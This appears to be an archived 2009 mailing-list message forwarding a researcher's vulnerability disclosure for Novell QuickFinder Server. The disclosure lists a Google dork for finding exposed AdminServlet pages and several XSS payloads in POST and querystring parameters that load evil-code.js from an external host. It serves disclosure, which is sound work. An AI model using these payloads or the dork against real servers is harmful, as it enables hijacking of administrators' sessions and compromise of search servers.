<<< Date Index >>>     <<< Thread Index >>>

[Suspected Spam][Fwd: Re: Novell-QuickFinder Server Xss & Java remote execution Code]



---------------------------- Mensaje original ----------------------------
Asunto: Re: Novell-QuickFinder Server Xss & Java remote execution Code
De:     "apisarczyk@xxxxxxxxxxxxxxxxx" <apisarczyk@xxxxxxxxxxxxxxxxx>
Fecha:  Mar, 10 de Febrero de 2009, 7:31 am
Para:   ivan.sanchez@xxxxxxxxxxxxxxx
Cc:     vuldb@xxxxxxxxxxxxxxxxx
--------------------------------------------------------------------------

Hello,

If you wish to publicly report a vulnerability please send the relevant
information to the bugtraq@xxxxxxxxxxxxxxxxx mailing list.

We also encourage you to contact the vendor if you haven't already.

Thanks,
Adrian

ivan.sanchez@xxxxxxxxxxxxxxx wrote:
> Dear,
>
> I send you this important issue from Novell QuickServer.
>
> Many thanks.
>
> Ivan Sanchez-
>

                             NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting 
Security Bugs!
+================================================================================================================================+
+                 Novell-QuickFinder Server //Cross-site scripting (XSS) Remote 
Java Execution Code                              +
+================================================================================================================================+


Author(s): Ivan Sanchez 

http://www.novell.com/products/openenterpriseserver/quickfinder.html

Date: 10/02/2009


Overview
--------

If your company's Web site is like most, it's not lacking in information. While 
your site's visitors have access to massive amounts of data, they may benefit 
from a faster, 
more efficient way to pinpoint what they're looking for: QuickFinder Server 
(formerly NetWare® Web Search) from Novell.

Unlike all-Web search engines, QuickFinder is targeted at the Enterprise. 
General Internet search engines index many Web sites and their component pages, 
but they either cannot or do not index all available content. Perhaps that's 
the reason more than 75 percent of Web-site visitors use site-specific search 
functionality when it's available to them. In fact, for many Web sites, the 
search-results page has more hits than does the home page. 
Yet more than 50 percent of large Web sites (over 500,000 pages) and 70 percent 
of moderately sized Web sites (up to 5,000 pages) do not offer search 
functionality to their visitors. 

"
Today I was checking a lot parameters,"POST" we have a lot of them to be 
exploited.
So I have posted some, but we have much more. 
cheers !!! "

GOOGLE DORKS:
------------

Google Search: inurl:"/NSearch/AdminServlet" 



Parameter Affected over http/https:
-----------------------------------




"add virtual server"

https://server:2200/qfsearch/AdminServlet?&req=displayaddsite

Post:
siteloc=%22%3E%3Cscript%20src=http://nullcode.com.ar/scripts/evil-code.js%3E%3C/script%3E

"Default"

Post:
https://server:2200/qfsearch/AdminServlet?site=globalsearchsite&req=generalproperties
site="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>

"services, synchronization"

Post:
https://server:2200/qfsearch/AdminServlet?&req=clusterserviceproperties
site="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>


Querystring:

https://server2200/qfsearch/AdminServlet?&req=global&adminurl=";><script 
src=http://www.nullcode.com.ar/scripts/evil-code.js></script>


Much more parameters have been affected.("print-list")



Remediation: Validate the Input. 
------------





                         NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting 
Security Bugs!
+================================================================================================================================+
+                 Novell-QuickFinder Server //Cross-site scripting (XSS) Remote 
Java Execution Code                              +
+================================================================================================================================+